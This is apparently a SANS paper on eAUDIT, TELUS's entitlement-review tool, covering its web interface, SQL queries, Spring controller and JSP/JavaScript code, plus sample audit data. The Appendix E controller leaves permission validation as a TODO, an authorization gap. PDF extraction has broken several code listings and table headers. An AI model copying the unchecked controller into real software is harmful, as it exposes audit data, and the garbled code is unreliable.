Gathering data and normalizing it into a database is fine, but eAUDIT needs to present this data to authorizers to allow for an efficient review. Currently, the web interface implementation of eAUDIT exists as a proof-of-concept written in Java and deployed in a customized Spring framework commonly used by TELUS Chief Security Office (CSO). Obviously, this customized framework is infused with TELUS enterprise standards: it relies on TELUS’s single sign-on (SSO) infrastructure, it has built-in security groups based on TELUS employee IDs, and it makes heavy use of TELUS-branded CSS. Many of these elements are either irrelevant to another organization or considered proprietary to TELUS and therefore will not be discussed here.
That being said, the core of the eAUDIT web implementation can be covered. This core is the audit interface, and to a lesser extent, the landing page for authorizers. Figure 18 shows the landing page for eAUDIT.
Welcome François Begin [T805959]. You have the following audits to complete:
<table>
<thead>
<tr>
<th>Audit Name</th>
<th>Audit Description</th>
<th>Start Date</th>
<th>End Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Canucks? stay or go?</td>
<td>Audit Canucks players and decide to keep them on the team next year or not!</td>
<td>2015-05-10</td>
<td>2015-06-30</td>
</tr>
<tr>
<td>eSAM active contractor audit</td>
<td>Audit eSAM contractors to determine if they are still active and report to a specific manager</td>
<td>2015-04-19</td>
<td>2015-06-19</td>
</tr>
<tr>
<td>Generic Audit example</td>
<td>An example of a generic audit to illustrate how the load template works</td>
<td>2015-05-10</td>
<td>2015-06-31</td>
</tr>
<tr>
<td>Restricted profiles in data center</td>
<td>Audit "R" profiles at data centers. These profiles always start with "R" IDC</td>
<td>2015-04-19</td>
<td>2015-06-19</td>
</tr>
</tbody>
</table>
The landing page is a simple. data table triggered when an authorizer logs in to the tool. A query is run using the employee ID of the authorizer as authenticated by SSO and returns audits that are currently active for that person (see Figure 19):
```
// SQL for AuditTypeReference for Authorizer T805959
SELECT DISTINCT t1.auditTypeReference, t1.auditName, t1.auditDescription
FROM Audit AS a
LEFT JOIN Authorizers AS au ON (a.idAuthorizer = au.idAuthorizer)
LEFT JOIN AuditTypeReference AS at ON (a.idAuditTypeReference = at.idAuditTypeReference)
WHERE au.idAuthorizer = 'T805959' AND a.auditEnd > NOW()
```

**Figure 18.** eAUDIT web interface main landing page for an authorizer.
The names of the audits are links to the review engine. Note that the audits here are AuditTypeReference records, with a single such record potentially representing multiple entitlements of similar entities.
If a user selects a specific audit, this request is intercepted by the controller. Appendix E and F show the simple code for the controller, as well as the SQL query that retrieves Entities records for a particular AuditTypeReference record – and a particular authorizer. Entities data is attached as an attribute called *EntityList* to a ModelAndView object (See Code sample 1).
François Bégin, francois.begin@telus.com
**Code sample 1. Attaching entity data to a ModelView.**
Audit.jsp (Appendix G) is where this data gets presented to the authorizer. Fundamentally, this is a simple page that presents the audit name, description and a data table with the entities (Code sample 2 and Figure 20)
```java
ModelAndView mv = new ModelAndView("audit");
mv.addObject("EntityList", auditDao.getEntitiesByAuditAndAuthorizer(auditID,
SDDIHelper.getCurrentTeamMemberNumericalPIDFromRequest(request)));
```
**Code sample 2. Main section of audit.jsp.**
The design decision to keep user-defined fields in JSON format was motivated by the fact that this data format can easily be manipulated. Javascript is used to generate the main audit data table on the fly. Although these fields are not easily or efficiently searchable by the system from the perspective of the whole dataset, once re-formatted in a data table, that data becomes easily sortable and filterable.
User-defined primary fields form visible rows while hidden rows hold the secondary attributes. Clicking on the details icon will trigger the hidden rows and present them to the authorizer (Code sample 3 and Figure 21):
Figure 20. eAUDIT web interface audit review page.
$\$('tbody td img').click(function() {
var nTr = this.parentNode.parentNode;
if (this.src.match('details_close')) {/* row is already open - close it */
this.src =
'${pageContext.request.contextPath}/img/details_open.png';
oTable.fnClose(nTr);
} else {/* Open this row */
this.src =
'${pageContext.request.contextPath}/img/details_close.png';
oTable.fnOpen(nTr, fnFormatDetails(oTable, nTr), 'details');
}
});
Code sample 3. Trigger to display/hide secondary entity attributes.
François Bégin, francois.begin@telus.com
Figure 21. Displaying secondary user-defined entity attributes in eAUDIT web.
The table auto-adjusts to the number of user-defined primary fields and to the number of user-defined secondary fields. There is obviously a physical limitation on the amount of screen real estate that one has access to, so the number of primary fields must be kept reasonable. Primary fields should be chosen amongst those fields that are most likely to clearly identify the entity to an authorizer, with secondary fields used occasionally by the authorizer to ascertain whether or not to confirm the entitlement. This confirmation is handled by action buttons at the end of each row.
As previously mentioned, using a data table has numerous advantages, including the ability to sort and filter the data. The filtering in particular can be used to focus on specific entitlements if multiple entitlements are being reviewed by the same authorizer within the same audit (see figure 22). Moreover, all of the work is offloaded to the client, leaving the server to simply process user requests.
François Bégin, francois.begin@telus.com
Since most of the heavy lifting is handled client-side, the tool must ensure that authorizers can only review entities and entitlements for which they are authorized, and this verification is made server-side, prior to updating table EntitiesAuditResponses.
### 2.6. Future enhancement
eAUDIT is still a proof-of-concept at this stage and requires polishing. The data model supports the ability for authorizers to delegate an audit to someone else. Delegation will give a busy authorizer the ability to offload some of his audit work to a trusted direct report. Additionally, the TELUS implementation will implicitly provide access to the supervisors of authorizers. This means that anyone above a base audit authorizer will be a super-authorizer, able to view and delegate any of these audits – or let their subalterns know they need to pick up the pace! Both the delegation feature and the implied super-authorizers feature should help promote high audit completion rates.
Another reality of audits is that the data provided may be stale or inadequate at load time. For instance, an employee loaded as an entity may not have a current manager. If the manager is the authorizer of a particular entitlement, this employee will not be reviewed. eAUDIT will address this challenge by taking the company’s organizational...
hierarchy into account when allowing entitlement review. It will provide reports to the audit administrator of these stale/incomplete records, allowing the administrator to review them himself, or re-assign them to someone who can.
Yet another feature of TELUS’s planned eAUDIT implementation is the use of a *PrimaryKey* in the Entities table to provide historical correlation between audits. This will allow an authorizer to determine whether or not this entity’s entitlement was reviewed or revoked the last time the audit ran.
Another important aspect of auditing that this paper did not cover is communication. A successful audit is one where authorizers are clearly informed of deadlines and reminded to meet them. The TELUS CSO has a communication tool called eMAC that is capable of handling audit communications (kickoff email, reminders, escalations) and eAUDIT will be tightly integrated with this tool to offer an end-to-end auditing solution.
### 3. Conclusion
This paper presented eAUDIT, a generic audit review tool to conduct entitlement reviews. This tool is currently being implemented at TELUS to mitigate some shortcomings of our identity and access management infrastructure. It should be noted that IAM is often seen through the lenses of compliance, and it is true that TELUS’s audit tools predecessors have been compliance-driven. On the other hand, there are other solid business cases to be made with regard to auditing and managing access properly: operational effectiveness (or cost savings) as well as business enablement are other considerations (Osmanoglu, 2013). There is already evidence to support the proposition that eAUDIT will benefit TELUS beyond compliance.
References
Retrieved from https://poi.apache.org/.
François Bégin, francois.begin@telus.com
Appendix A – eAUDIT data model
Appendix B – Setting up eAUDIT for a demo
Here is a quick overview of how to set up an environment to run/demo eAUDIT’s data acquisition capability. First, in a directory of your choice, clone the eAUDIT project code (Figure B-1).
Figure B-1. Cloning eAUDIT code from GitHub.
There are two separate projects in the code pulled from GitHub: the jEAUDITlibrary itself, as well as eAUDIT_BatchOps, a project to demonstrate data acquisition. You can import these projects into your preferred Java IDE to examine the code.
Next, you need to set up a server to run the eAUDIT database. eAUDIT was built on MySQL and the data model has been included as a MySQL WorkBench file inside jEAUDITlibrary (Figure B-2). A service account with read-write access to the database also needs to be created.
Figure B-2. MySQL WorkBench data model file for eAUDIT.
François Bégin, francois.begin@telus.com
Prior to running eAUDIT_BatchOps, a few configuration changes must be made:
1. Edit files `db_eAUDITDV` and `db_eAUDITPR`. Set the database name, user, password and URL to point to the database that was created to hold eAUDIT data.
2. Edit files `StaticParamsDV` and `StaticParamsPR` (Figure B-3). Set the path for the system where you will be trying out eAUDIT_BatchOps. Logging can also be adjusted through the various `LOG_*` parameters.
3. Create the `toolBasePath` directories. Assuming the demo is running on a Linux computer and the configuration file shown in Figure B-3, the following directories would need to be created:
a. `/export/data/eaudit`
b. `/export/data/eaudit/tmp`
c. `/export/data/eaudit/logs`
---
François Bégin, francois.begin@telus.com
Appendix C – AuditTypeRef sheet of the eAUDIT Excel template
<table>
<thead>
<tr>
<th>Field</th>
<th>Values</th>
<th>Help</th>
</tr>
</thead>
<tbody>
<tr>
<td>AuditName</td>
<td>Generic Audit example</td>
<td>Enter a short name that represents your audit</td>
</tr>
<tr>
<td>AuditDescription</td>
<td>An example of a generic audit to illustrate how the tool is used</td>
<td>Enter a short description of your audit</td>
</tr>
<tr>
<td>AuditStart</td>
<td>Sunday, May 10, 2015</td>
<td>Enter audit start date. Audit can only start 1 week from today at the earliest</td>
</tr>
<tr>
<td>AuditEnd</td>
<td>Sunday, May 31, 2015</td>
<td>Enter audit end data. Audit must last at least 1 week from its start date</td>
</tr>
<tr>
<td>AuditInstructionsEN</td>
<td><HTML> All of the employees in this list need to have entitlements for which you are the authorizer. Please review these entitlements at your earliest convenience. For each employee, please click the appropriate button to confirm or revoke the entitlement. Note that choosing revoke will not remove access until the audit has closed and the responses have been reviewed by the admin team. <BR> For any question related to this audit, please contact <a href="mailto:eauditadmin@acme.com">eauditadmin@acme.com</a> <BR/HTML></td>
<td>Enter the instructions that people you are auditing will see on the audit screen - English. HTML markup allowed</td>
</tr>
<tr>
<td>AuditInstructionsFR</td>
<td>Instructions in French here</td>
<td>Enter the instructions that people you are auditing will see on the audit screen - French. HTML markup allowed</td>
</tr>
<tr>
<td>UDEAprimaryFieldsEN</td>
<td>("Emp ID","Full Name","Emp Type","System ID")</td>
<td>List of UDEA primary fields names (labels in English, ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAprimaryFieldsFR</td>
<td>UDEA in French</td>
<td>List of UDEA primary fields names (labels in French ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAsecondaryFieldsEN</td>
<td>("Work Location","Province","Last login time to system")</td>
<td>List of UDEA secondary fields names (labels in English ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAsecondaryFieldsFR</td>
<td>UDEA in French</td>
<td>List of UDEA secondary fields names (labels in French ISO-8859-1 format)</td>
</tr>
<tr>
<td>AuditByManager</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>DataLoadType</td>
<td>Excel-load</td>
<td>Either Excel-Load for data loaded via this template or Adapter-Load for data loaded by an adapter script</td>
</tr>
<tr>
<td>eMACircleTimelineID</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>UseEMAC</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>AuditManager</td>
<td>François Bégin</td>
<td>The name/ID of the person responsible to manager this particular audit. The Audit manager has extended rights to the audit (delegation, reporting, etc.)</td>
</tr>
</tbody>
</table>
### Appendix D – AuditData sheet of the eAUDIT Excel template
<table>
<thead>
<tr>
<th>PrimaryKey</th>
<th>Description</th>
<th>AuthorID</th>
<th>Authority</th>
<th>UDAprimary</th>
<th>UDAsecondary</th>
<th>IDEAprimary</th>
<th>IDEAsecondary</th>
<th>IDEAaccession</th>
<th>IDEAaccession</th>
</tr>
</thead>
<tbody>
<tr>
<td>123456</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123456</td>
<td>Melia Hobel Contractor MHbox1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123467</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123467</td>
<td>Sonja Casiano Regular Statismatic Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123468</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123468</td>
<td>Jack Shankle Regular Jh2001 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123469</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123469</td>
<td>Sal Rackham Contractor SRackham USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123470</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123470</td>
<td>Brad Hildebrand Contractor BHildebrand USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123471</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123471</td>
<td>Kristian Denker Contractor EDenker USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123472</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123472</td>
<td>CECILIA HARVE Contractor Ch3001 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123473</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123473</td>
<td>Rebecca Piga Regular RHavig1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123474</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123474</td>
<td>Tomoko Melcicn Regular TMelcicn Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123475</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123475</td>
<td>Teshoda Burgess Contractor TBurg 1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123476</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123476</td>
<td>Eleonora Vanniky Regular Evanniky Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123477</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123477</td>
<td>Giovanni Vennza Regular GVennza1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123478</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123478</td>
<td>Randee Noga Regular RNoga Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123479</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123479</td>
<td>Barrett Backle Regular BBackle1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123480</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123480</td>
<td>Monet Dehner Regular MDehner1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123481</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123481</td>
<td>Sonia Lawan Regular SLawan1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123482</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123482</td>
<td>Andy Emersen Regular AEimersen1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123483</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123483</td>
<td>Hayley Niemnn Contractor HNiemnn1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123484</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123484</td>
<td>Samuel Ryer Contractor SRyer USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123485</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123485</td>
<td>Frederic Cason Contractor FCason1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123486</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123486</td>
<td>Leslie Rappor Contractor LRappor1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123487</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123487</td>
<td>Iris Stry Regular Stry1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123488</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123488</td>
<td>Joudie Voliace Regular JVoliace1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123489</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123489</td>
<td>Sue Rosenberg Regular SROsenberg1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123490</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123490</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123491</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123491</td>
<td>Shirley Proctor Regular SProctor1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123492</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123492</td>
<td>Alreda Glickman Regular AGlickman1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123493</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123493</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123494</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123494</td>
<td>Wes Greenz Regular WGreenz1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123495</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123495</td>
<td>Seema Singh ISingh1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123496</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123496</td>
<td>Jack Storkey Regular JSstrokey1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123497</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123497</td>
<td>Kriston DeHiler Contractor EDenker1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123498</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123498</td>
<td>Gorica Hare Contractor CHare3 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123499</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123499</td>
<td>Sumei Morena Contractor SMorena1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123500</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123500</td>
<td>Barrett Backle Regular BBackle1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123501</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123501</td>
<td>Monet Dehner Regular MDehner1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123502</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123502</td>
<td>Rex Goodrige Regular RGoodrige1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123503</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123503</td>
<td>Samuel Ryer Contractor SRyer USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123504</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123504</td>
<td>Joudie Voliace Regular JVoliace1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123505</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123505</td>
<td>Sue Rosenberg Regular SROsenberg1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123506</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123506</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123507</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123507</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123508</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123508</td>
<td>Wes Greenz Regular WGreenz1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123509</td>
<td>Admin of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123509</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123510</td>
<td>Admin of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123510</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
François Bégin, francois.begin@telus.com
Appendix E – Controller that maps a request to an authorizer view of audit data
```java
@RequestMapping({
"/audit/{auditID}"}
)
public ModelAndView displayAuditDetailsPage(@PathVariable String auditID)
throws ObjectNotFoundException, SQLException {
ModelAndView mv = new ModelAndView("audit");
//TODO: validate permission
IAuditDao auditDao = getAuditDao();
mv.addObject(USER_NAME, SDDIHelper.getCurrentTeamMemberNameFromRequest(request));
mv.addObject(USER_TID, SDDIHelper.getCurrentTeamMemberTIDFromRequest(request));
mv.addObject("AuditDetail", auditDao.getAuditDetailsByID(auditID));
mv.addObject("EntityList", auditDao.getEntitiesByAuditAndAuthorizer(auditID,
SDDIHelper.getCurrentTeamMemberNumericalPIDFromRequest(request)));
return mv;
}
```
Appendix F – SQL query getEntitiesByAuditIDAndAuthorizer to retrieve entities of a specific audit and specific authorizer
```xml
<statement id="getEntitiesByAuditIDAndAuthorizer"
resultMap="resultEntity"
parameterClass="map">
SELECT
e.idEntities, e.PrimaryKey,
e.UDEAprimaryFieldsValues,
e.UDEAsecondaryFieldsValues,
a.Entitlement,
resp.RecordedResponse
FROM Entities as e
INNER JOIN Audit as a
ON (e.Audit_idAudit=a.idAudit
AND a.AuditTypeReference_idAuditTypeReference = #auditType#)
LEFT JOIN Authorizers as auth
ON (auth.Audit_idAudit=a.idAudit)
LEFT JOIN EntitiesAuditResponses as resp
ON e.idEntities = resp.Entities_idEntities
WHERE auth.AuthorizerEmpID=#authorizerID#
</statement>
```
Appendix G – audit.jsp: main page of the eAUDIT review engine
```jsp
<%@ taglib prefix="form" uri="http://www.springframework.org/tags/form"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt"%>
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions"%>
<%@ taglib prefix="spring" uri="http://www.springframework.org/tags"%>
<%@ taglib prefix="sec" uri="http://www.springframework.org/security/tags"%>
<script>
var numOfPrimaryColumns = ${fn:length(AuditDetail.primaryFields)};
$(document).ready(function() {
var rootPath = '${pageContext.request.contextPath}';
var data = [];
var secondaryFields = [
<c:forEach items="${AuditDetail.secondaryFields}" var="pfield2" varStatus="loop">
${pfield2}<c:if test="${!loop.last}">,</c:if>
</c:forEach>
];
<c:forEach items="${EntityList}" var="entity">
data.push(
'<img
src="${pageContext.request.contextPath}/img/details_open.png">
<c:forEach items="${entity.primaryFields}" var="fieldValue">
${fieldValue},
</c:forEach>
"${entity.entitlement},
'<div class="ui-corner-all list_icon text_icon grey action_yes" title="Keep"><span class="ui-icon ui-icon-check"></span></div><div
```
François Bégin, francois.begin@telus.com
```javascript
var oTable = $('#dataTable').dataTable({
bJQueryUI: true,
"aaData": data,
"aoColumns": [
{ "sTitle": "", "sWidth": "20px" },
<c:forEach items="${AuditDetail.primaryFields}" var="pfield">
{ "sTitle": ${pfield} },
</c:forEach>
{ "sTitle": "Entitlement", "sWidth": "250px" },
{ "sTitle": "Actions", "sWidth": "40px" },
{ "sTitle": "details" }
],
"aoColumnDefs": [
{ "bSearchable": false, "bSortable": false,
"aTargets": [ 0 ] },
{ "bSearchable": false, "bSortable": false,
"aTargets": [ numOfPrimaryColumns + 2 ] }
];
});
```
François Bégin, francois.begin@telus.com
```json
{ "bSearchable": false,"bVisible": false,"bSortable": false, "aTargets": [ numOfPrimaryColumns + 3 ] }
"iDisplayLength": 1000,
sPaginationType : "full_numbers",
oLanguage : {
sProcessing : "<spring:message code="app.datatable.text1" />",
sLengthMenu : "<spring:message code="app.datatable.text2" />",
sZeroRecords : "<spring:message code="app.datatable.text3" />
sSearch : "<spring:message code="app.datatable.text8" />
sUrl : "<spring:message code="app.datatable.text9" />
oPaginate : {
sPrevious : "<spring:message code="app.datatable.text11" />
sNext : "<spring:message code="app.datatable.text12" />
sLast : "<spring:message code="app.datatable.text13"
}
}
```
/* Add event listener for opening and closing details * Note that the indicator for showing which row is open is not controlled by DataTables, * rather it is done here */
$('#dataTable tbody td img').click(function() {
//var nTr = $(this).parents('tr')[0];
var nTr = this.parentNode.parentNode;
if ( this.src.match('details_close') ) { /* This row is already open - close it */
this.src = "${pageContext.request.contextPath}/img/details_open.png";
oTable.fnClose(nTr);
} else { /* Open this row */
this.src = "${pageContext.request.contextPath}/img/details_close.png";
oTable.fnOpen(nTr,fnFormatDetails(oTable,nTr),'details');
}
});
$( "div.action_yes" ).mouseover(function() {
$(this).addClass('green').removeClass('grey');
}).mouseout(function(){
$(this).addClass('grey').removeClass('green');
}).click(function(){
$(this).addClass('greenSelected').removeClass('grey');
$(this).parent().find('div.action_no').removeClass('redSelected').addClass('grey');
});
```javascript
$( "div.action_no" ).mouseover(function() {
$(this).addClass('red').removeClass('grey');
}).mouseout(function() {
$(this).addClass('grey').removeClass('red');
}).click(function() {
$(this).addClass('redSelected').removeClass('grey');
$(this).parent().find("div.action_yes").removeClass('greenSelected').addClass('grey');
});
/* Formatting function for row details */
function fnFormatDetails(table, nTr) {
var aData = table.fnGetData(nTr);
return aData[numOfPrimaryColumns+3];
}
</script>
<div><h3>${AuditDetail.auditName}</h3></div>
<div><h5>${AuditDetail.auditDescription}</h5></div>
<div id="tableContainer" style="margin-left:auto; margin-right:auto; width:auto;clear:both;">
<table id="dataTable" style="width:100%;"></table>
</div>
François Bégin, francois.begin@telus.com
<table>
<thead>
<tr>
<th>Event Title</th>
<th>Location</th>
<th>Dates</th>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>SANS San Francisco Fall 2018</td>
<td>San Francisco, CAUS</td>
<td>Nov 26, 2018 - Dec 01, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>European Security Awareness Summit 2018</td>
<td>London, GB</td>
<td>Nov 26, 2018 - Nov 29, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Stockholm 2018</td>
<td>Stockholm, SE</td>
<td>Nov 26, 2018 - Dec 01, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Khobar 2018</td>
<td>Khobar, SA</td>
<td>Dec 01, 2018 - Dec 06, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Nashville 2018</td>
<td>Nashville, TNUS</td>
<td>Dec 03, 2018 - Dec 08, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Santa Monica 2018</td>
<td>Santa Monica, CAUS</td>
<td>Dec 03, 2018 - Dec 08, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Dublin 2018</td>
<td>Dublin, IE</td>
<td>Dec 03, 2018 - Dec 08, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>Tactical Detection & Data Analytics Summit & Training 2018</td>
<td>Scottsdale, AZUS</td>
<td>Dec 04, 2018 - Dec 11, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Frankfurt 2018</td>
<td>Frankfurt, DE</td>
<td>Dec 10, 2018 - Dec 15, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Bangalore January 2019</td>
<td>Bangalore, IN</td>
<td>Jan 07, 2019 - Jan 19, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Sonoma 2019</td>
<td>Santa Rosa, CAUS</td>
<td>Jan 14, 2019 - Jan 19, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Amsterdam January 2019</td>
<td>Amsterdam, NL</td>
<td>Jan 14, 2019 - Jan 19, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Miami 2019</td>
<td>Miami, FLUS</td>
<td>Jan 21, 2019 - Jan 26, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Dubai January 2019</td>
<td>Dubai, AE</td>
<td>Jan 26, 2019 - Jan 31, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Las Vegas 2019</td>
<td>Las Vegas, NVUS</td>
<td>Jan 28, 2019 - Feb 02, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Security East 2019</td>
<td>New Orleans, LAUS</td>
<td>Feb 02, 2019 - Feb 09, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS SECS04 Stuttgart 2019 (In English)</td>
<td>Stuttgart, DE</td>
<td>Feb 04, 2019 - Feb 09, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Anaheim 2019</td>
<td>Anaheim, CAUS</td>
<td>Feb 11, 2019 - Feb 16, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Secure Japan 2019</td>
<td>Tokyo, JP</td>
<td>Feb 18, 2019 - Mar 02, 2019</td>
